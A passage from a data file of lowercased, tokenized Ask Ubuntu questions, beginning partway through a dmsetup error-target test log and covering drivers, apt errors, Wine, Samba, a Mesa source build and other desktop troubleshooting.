] buffer i/o error on device dm-0 , logical block 8 sep 5 17:21:19 ubuntu kernel : [ 1370.325245 ] buffer i/o error on device dm-0 , logical block 8 +++ test 2 error block at 9 , buffer i/o error at lb 4 root @ ubuntu : ~ # dmsetup create test x.tab root @ ubuntu : ~ # dmsetup table test 0 9 linear 8:16 0 9 1 error 10 1000 linear 8:16 9 root @ ubuntu : ~ # dd if=/dev/mapper/test of=/dev/null bs=512 count=1000 dd : error reading ‘/dev/mapper/test’ : input/output error 8+0 records in 8+0 records out 4096 bytes ( 4.1 kb ) copied , 0.000630946 s , 6.5 mb/s root @ ubuntu : ~ # sep 5 17:23:28 ubuntu kernel : [ 1499.435904 ] bio : create slab < bio-1 > at 1 sep 5 17:23:28 ubuntu kernel : [ 1499.440980 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441010 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441037 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441062 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441087 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441314 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441340 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:28 ubuntu kernel : [ 1499.441805 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:53 ubuntu kernel : [ 1524.710414 ] buffer i/o error on device dm-0 , logical block 4 sep 5 17:23:53 ubuntu kernel : [ 1524.710572 ] buffer i/o error on device dm-0 , logical block 4 +++ test 3 error blocks start at 1000 for 10 blocks , buffer i/o error at lb 500 root @ ubuntu : ~ # dmsetup create test x.tab root @ ubuntu : ~ # dmsetup table test 0 1000 linear 8:17 0 1000 10 error 1010 1000 linear 8:17 1010 root @ ubuntu : ~ # dd if=/dev/mapper/test of=/dev/null bs=512 count=12000 dd : error reading ‘/dev/mapper/test’ : input/output error 1000+0 records in 1000+0 records out 512000 bytes ( 512 kb ) copied , 0.00278218 s , 184 mb/s root @ ubuntu : ~ # sep 5 17:37:04 ubuntu kernel : [ 2314.961989 ] bio : create slab < bio-1 > at 1 sep 5 17:37:12 ubuntu kernel : [ 2322.956596 ] buffer i/o error on device dm-0 , logical block 500 sep 5 17:37:12 ubuntu kernel : [ 2322.956600 ] buffer i/o error on device dm-0 , logical block 501 sep 5 17:37:12 ubuntu kernel : [ 2322.956602 ] buffer i/o error on device dm-0 , logical block 502 sep 5 17:37:12 ubuntu kernel : [ 2322.956603 ] buffer i/o error on device dm-0 , logical block 503 sep 5 17:37:12 ubuntu kernel : [ 2322.956605 ] buffer i/o error on device dm-0 , logical block 504 sep 5 17:37:12 ubuntu kernel : [ 2322.957147 ] buffer i/o error on device dm-0 , logical block 500 sep 5 17:37:12 ubuntu kernel : [ 2322.957149 ] buffer i/o error on device dm-0 , logical block 501 sep 5 17:37:12 ubuntu kernel : [ 2322.957151 ] buffer i/o error on device dm-0 , logical block 502 sep 5 17:37:12 ubuntu kernel : [ 2322.957152 ] buffer i/o error on device dm-0 , logical block 503 +++ test 4 error block at 1000 , buffer i/o error at lb 1000 root @ ubuntu : ~ # dmsetup create test x.tab root @ ubuntu : ~ # dmsetup table test 0 1000 linear 8:17 0 1000 1 error 1001 1000 linear 8:17 1010 root @ ubuntu : ~ # dd if=/dev/mapper/test of=/dev/null bs=512 count=12000 dd : error reading ‘/dev/mapper/test’ : input/output error 1000+0 records in 1000+0 records out 512000 bytes ( 512 kb ) copied , 0.00379868 s , 135 mb/s root @ ubuntu : ~ # sep 5 17:38:48 ubuntu kernel : [ 2419.516088 ] bio : create slab < bio-1 > at 1 sep 5 17:38:54 ubuntu kernel : [ 2425.506135 ] buffer i/o error on device dm-0 , logical block 1000 sep 5 17:38:54 ubuntu kernel : [ 2425.506953 ] buffer i/o error on device dm-0 , logical block 1000 +++ test 5 error blocks start at 1001 for 2 blocks , buffer i/o error at lb 1001 root @ ubuntu : ~ # dmsetup create test x.tab root @ ubuntu : ~ # dmsetup table test 0 1001 linear 8:17 0 1001 2 error 1003 1000 linear 8:17 1010 root @ ubuntu : ~ # dd if=/dev/mapper/test of=/dev/null bs=512 count=12000 dd : error reading ‘/dev/mapper/test’ : input/output error 1000+0 records in 1000+0 records out 512000 bytes ( 512 kb ) copied , 0.00362554 s , 141 mb/s root @ ubuntu : ~ # sep 5 17:42:16 ubuntu kernel : [ 2627.373744 ] bio : create slab < bio-1 > at 1 sep 5 17:42:24 ubuntu kernel : [ 2635.080482 ] buffer i/o error on device dm-0 , logical block 1001 sep 5 17:42:24 ubuntu kernel : [ 2635.080486 ] buffer i/o error on device dm-0 , logical block 1002 sep 5 17:42:24 ubuntu kernel : [ 2635.081327 ] buffer i/o error on device dm-0 , logical block 1001 sep 5 17:42:24 ubuntu kernel : [ 2635.081329 ] buffer i/o error on device dm-0 , logical block 1002
520359	how to detect touchscreen devices from a script ?	i 'm looking for a reliable way to detect if a laptop has a touchscreen device from a script . i know i can parse the output of : $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ elan touchscreen id=10 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=12 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ toshiba web camera - hd id=9 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] ↳ toshiba input device id=13 [ slave keyboard ( 3 ) ] but ideally i 'd prefer not having to rely on a product name . actually i 'm looking for a flag clearly stating that such device exist on my test system .
520361	unknown error : class system error for ubuntu 14.04	i have tried everything but still not working . this start when i tried installing google chrome but i have fix it and now my problem is this : e : malformed line 2 in source list /etc/apt/sources.list.d/google.list ( dist ) e : the list of sources could not be read . e : the package lists or status file could not be parsed or opened . when i 'm trying to sudo apt-get auto clean thats the message i receive and when i also try to install something thats what i receive . can you help me with this please ?
520363	attributeerror : 'gi.repository.gobject ' object has no attribute 'gobjectmeta '	when trying to run software-center get an error : ' $ ' attributeerror : 'gi.repository.gobject ' object has no attribute 'gobjectmeta' i searched and found a lot of users with such problem . i tried sudo rm -r /var/lib/apt/lists/* sudo mkdir /var/lib/apt/lists/partial sudo apt-get update it does not work for me . i 'm using ubuntu 12.10 ( 64-bit ) .
520367	how do i get 32/64 bit open gl libraries ?	i 'm a complete n00b so bear with me . i 'm trying to install league of legends and i have pol 4.2.4 , wine 1.7.25 and nvidia 's proprietary driver 340.32 . i 'm running 64 bit ubuntu 14.04 . i 've tried so many different things ... i 'm lost ... please help . looking for python ... 2.7.6 - selected [ main ] message : playonlinux ( 4.2.4 ) is starting [ clean_tmp ] message : cleaning temp directory [ check_opengl ] warning : 32bits direct rendering is not enabled [ check_opengl ] warning : 64bits direct rendering is not enabled [ pol_system_checkfs ] message : checking filesystem for /home/pmstr/.playonlinux/ [ main ] message : filesystem is compatible [ install_plugins ] message : checking plugin : capture ... [ install_plugins ] message : checking plugin : screencap ... [ install_plugins ] message : checking plugin : playonlinux vault ... [ maj_check ] message : list is up to date that 's what happens when i run pol through terminal .
520368	i have no longer access to unity de after installing xfce de on ubuntu 14.04 . is it fine ?	i followed this link . now whenever i log in to my computer , it shows the xubuntu login screen . when i go for choosing the other de in the login page , i can only find two des `` xfce '' & `` xubuntu session '' . is this a problem ? also , i think , all the drivers will have to be reinstalled as i did when i was using unity de . i like the xfce desktop environment and want to stick with it . will i be requiring to login to unity de in future ( even if i dont want to ) ?
520369	how to fix spotify glitch / flutter ?	i have been running spotify linux preview and i notice a very annoying glitch , whenever i roll my mouse over search results or anything of that sought , spotify starts fluttering . please suggest a fix for this bug ! ! http : //i.imgur.com/wztdurp.png ? 1
520370	emacs keybindings for all text inputs	i type with ten fingers . i try to avoid all keys on the keyboard which are not easily accessible : pos1 end1 esc ... up to now my fingers like the emacs key bindings , since they work in the editor and with bash : ctrl-a : beginning of line ctrl-e : end of line ctrl-k : kill from cursor until end of line ctrl-y : insert killed content ( paste ) i am currently switching from emacs to pycharm . now i could modify pycharm ( there is already a config with emacs key bindings ) . but still there are a lot of other applications like webbrowser , email client , ... which do n't understand the key bindings . ai n't there a way to have the fundamental things available in all text inputs ? update i am not fixed to the emacs keybings . i am still young enough to learn a different one . but it needs to be accessible for ten finger typers : i do n't want to leave keys f and j with my forefingers .
520373	where to define : gtk3-examples backround in 14.10	hi , it isnt working well . trusty gtk3 widget factory works and utopic doesn ' t . my own themes have the same issue ' cause they are based on ambiance , even if they look different . where is the damn theme definition this time ? ? ? .background etc . gtkwindow etc . doesnt work . is it something with glassy ? ? ? regards bluedxca93
520375	asus g550 no sound	i have no sound coming from the notebook ( on windows it works ) , if i plug in a headset it does work flawlessly . reading up on the issue i could n't find any working solution . but seen people love to see alsa info , so here it is : http : //www.alsa-project.org/db/ ? f=cfe46c697339f6aec2ce1b9919b5ded493051b58
520376	slow samba server when authenticating with remote ldap server	i am running a samba server locally but it authenticates off an ldap server around the world , it works ok as in i can open folders etc with the right permissions . the issue is it takes about 10-15 seconds just to open the folder . the samba server is on a gigabit network , and i suspect the issue is maybe something to do with having to authenticate to ldap ? ? ? the rtt is 300 ms between the two sites
520377	can i see in a log file all gui based tasks in its alternative command-line format ?	for example , i normally open mousepad ( xfce equivalent of gedit ) from the applications menu . however , i know that you can also do this in a terminal by typing mousepad . following this example , what i want is whenever i open mousepad via gui , a new line is written in a log file stating something like sep 5 15:35:11 lucho @ lucho : ~ $ mousepad . more in general , what i want is to log all gui activities that are potentially do-able via command-line ( like opening programs , changing permissions , modifying a system settings , etc ) but written in its alternative command-line execution format . i want this in order to improve my knowledge of how to use the command-line ( without going through the man pages ) . there are many things i do through the gui which i do n't do via command-line ( some potentially automatable via a script or via keyboard shortcuts ) and having this log file would be a good way to learn them . i 'm aware of the existence of the syslog file in /var/log but that is not what i need . the activity log manager app from ubuntu repositories does not show command-line format , so far as i know . i need something like the .bash_history file that exist in my home folder but recording my gui-based activities .
520378	cancel installing pending package with apt-get	yesterday i trying to install a package with apt-get but i regret of installing this package , but every time i want to install a new package the apt-get trying to install that package again ! how i can cancel hold packages in apt-get ?
520379	where can i find more unity themes ?	this might already be answered , but i ca n't find it . i am getting a bit bored of the traditional purple feel of unity and i would like something new . where can i find more unity themes ? i have already tried synaptic , but could not find anything . i would rather avoid people 's personal ppa 's .
520381	windows xp upgrade	i am trying to upgrade an old windows xp machine to ubuntu . my question is can i install ubuntu and keep my windows xp files and how do i upgrade and keep those files ?
520382	which version for hp pavilion g4 g4-1317au laptop ( amd dual core a4 3330m- 2gb ram	which version is specific for my hp pavilion g4-1317au laptop ( amd dual core a4 3330m- 2gb ram- 500gb hdd- 14 inches- dos- discrete class amd radeon hd 6480g graphics ) ? ? ? ?
520385	enable remote access for mysql	i have mysql server located in ubuntu 14.04 lts and i would like to enable remote access . i have already tried to change bind-address to ip that mysql is hosted on ( and restart ) and grant user but still not success . does anyone know what else should i do ?
520386	etherwall daemon is not running on ubuntu 14.04	etherwall is an app to hide my ip address . however , my etherwall daemon is not running on ubuntu 14.04 . how do i fix it ? here my terminal : do you agree with the license ? [ y/n ] y creating etherwall installation directory and copying files ... creating etherwall script ... creating etherwall console script ... copying etherwall configuration files ... copying manual pages ... setting executable flags ... installation finished . type 'etherwall ' or 'ethwconsole ' as root to run etherwall . root @ yudie-aspire-2920 : /home/yudie/etherwall-1.0.beta3 # etherwall start starting etherwall daemons ... root @ yudie-aspire-2920 : /home/yudie/etherwall-1.0.beta3 # etherwall status etherwall daemon is not running , please check logfile `/var/log/etherwall/etherwall.log ' for more information . log file : 2014-09-02 18:35:49,986 info starting daemon ... 2014-09-02 18:35:49,998 info changing arptables policy on chain input & output ... 2014-09-02 18:35:50,079 info deleting all arp entries ...
520388	install ubuntu on sibo android tablet	i have sibo android tablet , i want to remove the android from it and install new ubuntu touch . my hardware specification- product type : 10 inch quad core tablet pc m1015 cpu : mtk8382 ram : 1gb flash : 8gb touch screen : 10.1 inch , multi touch will you please help me with this ?
520389	drivers for my pc with ubuntu installed	i am still a beginner in using ubuntu , i have tried it a couple of times before on my old pc and actually my experience was pretty dramatic , besides the fact that i really want to use ubuntu , i have to use it for developing a project on a linux platform and specifically on ubuntu , it 's demanded by my professor . so , what i want to ask about because i 'm afraid to lose my data or wipe out my hdd again or suffer from some problems concerning my wireless card or my graphics card . 1-is it okay if i went on using a virtual machine for development or will it be difficult , slow and has lots of drawbacks ? 2-if i have no choice but to have a dual-boot pc , i have a toshiba satellite l50-a668 with intel graphics hd 4600 and nvidia geforce 740 m , last time i wiped out my hdd , i really suffered until i got the proper drivers that made them work properly together but that was on windows , however i did n't know to how to get them for ubuntu 14.04 lts how can i get versions of these drivers specifically for ubuntu ? this link includes all the specifications of my laptop : http : //www.toshibamea.com/computerproduct/4/satellite_l50-a668/52942 ? pageid=4 thanks in advance
520391	display thunderbird unread count docky gnome	i was wondering if it 's possible to display the unread e-mail 's count on the thunderbird icon on my docky bar . i am using ubuntu gnome and already have tried multiple things which include : installing docky unread count 0.7.0 add-on for thunderbid gnome shell integration plug-in . but nothing seems to work . if it 's not possible is there any way i can get a notification using just thunderbird in the top bar of gnome shell ? i do n't want to use evolution . thanks
520393	system hangs and screen fades	i am using 14.04 . sometimes the system hangs for no apparent reason and the screen fades . without me doing anything the system returns to normal ? please help .
520394	cloning vs imaging in ubuntu	currently i am working on ubuntu system . now i have to create a backup on the other hard drive , such that i can replicate/install my whole system on the another system . so i have following drives . what is actual difference between clone and imagining . i need to replicate all installed softwares/packages into it ( for example i have installed ruby on it ) . so what is the best way for doing it .
520398	rhythmbox starts playing last song on album	this feels like a silly question , but i have a habit of navigating to my music directory using nautilus , navigating to an album folder and using ctrl + a then return to play , which launches rhythmbox . its an old windows habit but i prefer this method of navigation due to the state of my id tags . however , on media players in windows , the media player would always start from the start . in ubuntu , rhythmbox adds all the songs to the library then starts to play the last one ... how can i get rhythmbox to play the songs from the start with this method . or will i have to install a more basic lightweight player ( suggestions )
520400	can one x client have multiple window ?	i would like to understand x window system and its terminology . so i have several question : can one x client have mutiple window ? i think that it can but i am not sure . what is relation between proces and x cient : a ) can one process have multiple x clients ? in another word , can multiple clinet work in one process ? b ) is possible that one x client work in multiple process ? ( i think that it is impossible and it question is stupid ) there are application which allow to deattach window from it . what determines if this deattached window has the same or new x client ? what determines if this deattached window opertes in new or in the same proces ? i think that both depend on application and are independent from x window system . e.g . firefox allows to open tab in new window . i checked that there is still one firefox process so both windows opearte in one process . are both windows ordered by one x client ?
520401	installing epson l120	my os is ubuntu 1404 . just installed an epson 120 in wine . install process was fine . icon now appears in desktop . problem is i ca n't open the printer . says , `` there is no windows program configured to open this type of file . '' what to do next ? epson l120 is not in the database of ubuntu . help please ? thank you .
520404	using dd and an sdcard	i had ubuntu 14.04 running sweetly however when installing an img to an sd card for a raspberry pi like so : dd bs=4m if=2014-06-20-wheezy-raspbian.img of=/dev/mmcblk0 my beloved ubuntu now boots like so : busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) have i just made a major mistake and dd over the filesystem on the hdd ? is there a fix ?
520405	pen drive bootable problem	when i am trying to make my pendrive bootable it shows an error `` there is no enough space for this image '' -using startup disk , i have also tried using unetbootin but i am using a 32 gb kingstone 3.0 datatraveler , i made other pendrives which are of 4gb live with the same application what can i do to make it live ( or is it a bug )
520406	cant able to find web cam driver , uninstalled automatically	how can i find the actual driver for my webcam , fujitsu lifebook a series ah532 .
520407	primary screen blank if external monitor already connected on start up	i have installed ubuntu 14.04 on my acer iconia w700 . when i boot and afterwards plug in an external monitor everything works . however , if the monitor is already connected during boot , the screen of the machine stays black while the external monitor is ok . the black monitor is recognized by xrandr and the display panel in the system settings and i can also move windows to the black monitor without seeing them and change its brightness . changing random settings in the display panel of the systems settings and pressing apply causes the screens to flicker and the display eventually appears . but i 'm getting tired of doing this procedure on every start up . would be cool if you guys had some ideas .
520409	why does removing cheese-common removes a bunch of ubuntu essential package ?	i 'm trying to remove some bloatware and when i tried to purge cheese-common bunch of things that i think essential to ubuntu will be removed . i 'm using 14.04lts trying to follow this guide on what to remove link
520410	wine ( rundll32.exe ) error	i am new to ubuntu.i have installed my ubuntu 14.04 correctly and downloading wine from ubuntu software center.its properly installed . when installing bluestacks through wine , it shows error ( rundll32.exe is missing ) .where can i download the missing .dll files ?
520411	can not access bios after ubuntu uefi installation !	i recently installed ubuntu 14.04 in my fujitsu ah532 laptop . it was just working fine before the installation . but when i planned to install windows 8.1 , i could not access the boot menu or bios setup either . when pressed f12 for boot menu it just looks like it , even if i got my usb stick attached to my laptop when i press f2 it just displays the options for booting into ubuntu help me ! i ca n't even install or load anything from bios !
520412	ubuntu after installing nvidia drivers	i installed nvidia geforce g210 video driver on my ubuntu 14.04 . setup was succesful , i 've not got any errors and it 's working as expected , but after restart i 'm always getting the console logs . i 'm not stacked with them : they appear on each start , restart and shutdown , but they 're annoying me . how can i turn off them ? sorry for my english and yes ... i 'm not new to ubuntu , but i 'm new to the linux console .
520413	how to properly remove mesa and install it from source ?	i have xorg-edgers ppa added to my system ( https : //launchpad.net/~xorg-edgers/+archive/ubuntu/ppa ? field.series_filter=trusty ) with the latest x-org/mesa packages ( almost ) every day . recently ( around last week of august ) i have noticed that i am having some visual problems while playing diablo iii on wine and would like to revert to older version of mesa . i have found out that i can compile and install it from source like mentioned here sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get dist-upgrade sudo apt-get build-dep mesa sudo apt-get install llvm-dev wget ftp : //ftp.freedesktop.org/pub/mesa/10.3/mesalib-10.3.0-rc2.tar.bz2 tar -xvf mesalib-10.3.0-rc2.tar.bz2 cd mesa-10.3.0-rc2 ./configure -- enable-gallium-llvm make sudo make install what steps should i follow to properly uninstall the old one and install ( make install ) the new one from source ? i am using trusty with nvidia-331-updates ( 331.38-0ubuntu7.1 ) . this are the versions of mesa libs that i have installed : dpkg -l | grep mesa ii libegl1-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the egl api -- runtime ii libegl1-mesa-dev 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the egl api -- development files ii libegl1-mesa-drivers : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the egl api -- hardware drivers ii libgl1-mesa-dev 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl api -- glx development files ii libgl1-mesa-dri : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl api -- dri modules ii libgl1-mesa-dri : i386 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty i386 free implementation of the opengl api -- dri modules ii libgl1-mesa-glx : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl api -- glx runtime ii libgl1-mesa-glx : i386 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty i386 free implementation of the opengl api -- glx runtime ii libglapi-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the gl api -- shared library ii libglapi-mesa : i386 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty i386 free implementation of the gl api -- shared library ii libgles1-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl|es 1.x api -- runtime ii libgles1-mesa-dev 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl|es 1.x api -- development files ii libgles2-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl|es 2.x api -- runtime ii libgles2-mesa-dbg : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl|es 2.x api -- debugging symbols ii libgles2-mesa-dev 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the opengl|es 2.x api -- development files ii libglu1-mesa : amd64 9.0.0-2 amd64 mesa opengl utility library ( glu ) ii libglu1-mesa : i386 9.0.0-2 i386 mesa opengl utility library ( glu ) ii libglu1-mesa-dev 9.0.0-2 amd64 mesa opengl utility library -- development files ii libmirclientplatform-mesa : amd64 0.1.8+14.04.20140411-0ubuntu1 amd64 display server for ubuntu - client platform library for mesa ii libopenvg1-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 free implementation of the openvg api -- runtime ii libosmesa6 : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 mesa off-screen rendering extension ii libosmesa6 : i386 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty i386 mesa off-screen rendering extension ii libwayland-egl1-mesa : amd64 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 implementation of the wayland egl platform -- runtime ii mesa-common-dev 10.4.0~git20140904.3dbf55c1-0ubuntu0sarvatt~trusty amd64 developer documentation for mesa ii mesa-utils 8.1.0-2 amd64 miscellaneous mesa gl utilities
520415	installing wow with wine 1.6 on 14.04	i 'm very new to ubuntu . i have n't the slightest clue about how half of this works ( it was given to me ) the main thing i am interested in is playing wow . i 've already installed wine 1.6 and the game client for wow . i right clicked on the wow set up to open it with wine . i got battle net installed and logged in . however , every time i click install it force closes and comes up with a blizzard error . the only solutions i could find were ones that you could do if you 'd already had wow installed , only i ca n't even get that far . i really do n't know what to do here , i appreciate any help !
520416	how to optimize ubuntu 64bit for best php efficiency	i am php programmer . i want to work at my script in localhost but i want i have n't any proble after upload the script in host . i now have problem about permission . i wa n't to config my ubuntu 64it ( 14.04 ) to most likely to host . sorry may bad language becuase i 'm not english . thanks for help .
520417	gnome-terminal profile without bash history	i 'm trying to create a profile in gnome-terminal that does n't store bash history . the easiest way to do that is to run export histignore= '' * '' , but there is one problem , gome-terminal is executing command before running bash , so this variable is being overwritten . i was thinking about using .profile or .bashrc , but i do n't want it to execute every time bash starts and i do n't know how to determine which profile is being used by gnome-terminal from within terminal .
520420	hostname shows as vps ubuntu	hi i am using a ubuntu server , some other person has made it . i checked my host name by typing hostname it says vps . i checked in my etc/hostname file it says the name is vps in /ect/hosts file it has 127.0.0.1 localhost 127.0.1.1 vps.xxxxxx.no vps xxx.xx.xxx.xx xxxxxx.com and xxx.xx.xxx.xx is my site 's ip address also this site is accessed by a url different than xxxxxx.com . lets say my sitec is accessed via zzzzzzz.com my problems are in /ect/hosts it says site host is xxxxxx.com but you can access it by a different name zzzzzzz.com . so where can you set that setting ? also my hostname is showing as vps and what is the logic behind that i know these are dumb questions but i can not find any thing .
520427	how to update manual page in ubuntu 12.04 ?	i was planning to view manual page for 'ip ' command for usage on 'ip tuntap ' . to my surprise , there was no 'tuntap ' pattern in that manual page . however 'ip tuntap ' is well-supported when i try to use that command . so i guess that my local manual page for 'ip ' is outdate and need to be upgraded . i know that some manual pages can be installed by 'apt-get install xxx-doc ' . but how can i upgrade the manual for 'ip ' ? many thanks !
520430	since updating to ubuntu 14.04 computer crashes every time i load anything higher than linux 3.13.0-26-generic	i recently upgraded from 13.10 to 14.04 lts . now if i try and load a linux kernel higher than 3.13.0-26-generic the computer crashes and reboots . i have tried to reinstall 14.04 lts from cd but this just crashes too so i have no way to repair this problem .
520432	how to locally add my charms to the juju-gui ?	i know there are something like this export juju_repository=/var/repository/charms or charms can be deployed by drag and drop from desktop directly to the juju-gui canvas . but i mean how add my packages to the charm browser which are located on the left sidebar in juju-gui ( or it is possible wihtout publishing to charm store ) ?
520435	webstorm website connecting remotely	i am new to ubuntu and to webstorm so please bare with me if its very basic question . i am trying to connect to the website run by webstorm on ubuntu from windows 8.1 pc http : // < ipaddressofubuntu > :34433/.. . the option in webstorm which allows remote connection is enabled . i can also ping to the ip address to the ubuntu box ( from windows 8.1 pc which has its firewall off ) .but then i connect it using browser http : // < ipaddressofubuntu > :34433/.. it returns that server has refused the connection ! i am not sure how to deal with firewall ( or similar ) in ubuntu . any idea ?
520436	how stop graphics from being slow despite latest nvidia drivers ?	time for yet another graphics card q . sorry in advance , but i have tried what i take to be the 'normal ' way already ( see below ) , so here it goes : i have an intel atom d525 1.8ghz with a discrete nvidia ion 512mb ddr3 graphics card , on which i run ( for reasons i will spare you ) ubuntu 11.10 . what i want to know is primarily how to fix the laggy behaviour on my current setup . the machine is supposed to be able to support hd video . in fact , the spec sheet says : digital hdmi v1.3 output ( dvi via adapter ) , max . 1920 x 1200 analog vga output , max . 2048 x 1536 nvidia purevideo hd supports full hd decode ( 1080i/p ) i have the machine connected to the tv via hdmi . watching small video files ( sub 1gb ) all is fine , but most often 720p and all 1080p video files i have are very sluggish . and watching flash videos via the browser is likewise awful . i have updated to the latest nvidia drivers through sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current but with no success : it is just as sluggish as always . note ( if at all relevant ) : if instead of playing video directly from my machine , i go via a media server ( i use serviio ) , i can watch the hd content via my tv or ps3 . finally , here is some additional lspci output : vga compatible controller : nvidia corporation gt218 [ ion ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : holco enterprise co , ltd/shuttle computer device 4003 flags : bus master , fast devsel , latency 0 , irq 16 memory at fd000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at ce000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at cc00 [ size=128 ] [ virtual ] expansion rom at fe980000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel capabilities : [ 128 ] power budgeting < ? > capabilities : [ 600 ] vendor specific information : id=0001 rev=1 len=024 < ? > kernel driver in use : nvidia kernel modules : nvidia , nouveau , nvidiafb
520439	change current song from lock screen	we have a sonos box in our office which is connected to my laptop . music source is spotify for ubuntu . usually i try to skip songs which are n't `` office compatible '' ( like when it 's too edgy or so ) . i 'd like my colleagues to allow to skip the song when i 'm not at my desk . for this my keyboard provides those media keys ( keyborad itself is a logitech k750 ) . unfortunately they wo n't work when the screen is locked - only the volume buttons work , but not those for play/pause/skip . is there some way i can enable these to work from the lock screen ?
520443	which is better for chinese , ubuntu or ubuntu kylin ?	my friends always say , '' ubuntu is better than kylin `` . now i wonder which one is more suitable for a chinese ? by the way , what anti-virus software is suitable for ubuntu kylin ?
520444	freenx and nx broken in 14.04 - black screen on login	i updated from 12.02 to 14.04 lts . i had been using freenx to login from my windows desktop machine , but now it appears ubuntu is n't playing nicely with freenx anymore . this appears to be the case with version 3.5 of the official nomachine server as well . the problem is , i have to use nomachine 3 or 4 as my windows client because of software restrictions at my company for the forseeable future . is there a solution out there that i can try to get nomachine to connect to ubuntu ( preferably using some version of unity ) ? it seems inconceivable that such a useful program does n't have more development activity ...
520448	problems installing ubuntu on hp mini laptop	i have used about 3 different usb stick to create a bootable ubuntu . boot to it but each time the installation stalls at command prompt . any idea on what could be the problem and how to solve it ? thanks
520451	what was the first ubuntu release with a live cd feature ?	what was the first ubuntu release which features the bootable live cd option which makes it possible to run the os without installing it ?
520452	pc slow after installing iredmail so i purged what i could find but its still slow	last login : fri sep 5 14:21:31 2014 from 41.50.7.65 ^pkittykat @ zimserver : ~ $ ps aux user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.1 33912 1820 ? ss 12:04 0:04 /sbin/init root 2 0.0 0.0 0 0 ? s 12:04 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s 12:04 0:03 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s < 12:04 0:00 [ kworker/0:0h ] root 7 0.0 0.0 0 0 ? s 12:04 0:03 [ rcu_sched ] root 8 0.0 0.0 0 0 ? r 12:04 0:03 [ rcuos/0 ] root 9 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuos/1 ] root 10 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuos/2 ] root 11 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuos/3 ] root 12 0.0 0.0 0 0 ? s 12:04 0:00 [ rcu_bh ] root 13 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuob/0 ] root 14 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuob/1 ] root 15 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuob/2 ] root 16 0.0 0.0 0 0 ? s 12:04 0:00 [ rcuob/3 ] root 17 0.0 0.0 0 0 ? s 12:04 0:00 [ migration/0 ] root 18 0.0 0.0 0 0 ? s 12:04 0:00 [ watchdog/0 ] root 19 0.0 0.0 0 0 ? s < 12:04 0:00 [ khelper ] root 20 0.0 0.0 0 0 ? s 12:04 0:00 [ kdevtmpfs ] root 21 0.0 0.0 0 0 ? s < 12:04 0:00 [ netns ] root 22 0.0 0.0 0 0 ? s < 12:04 0:00 [ writeback ] root 23 0.0 0.0 0 0 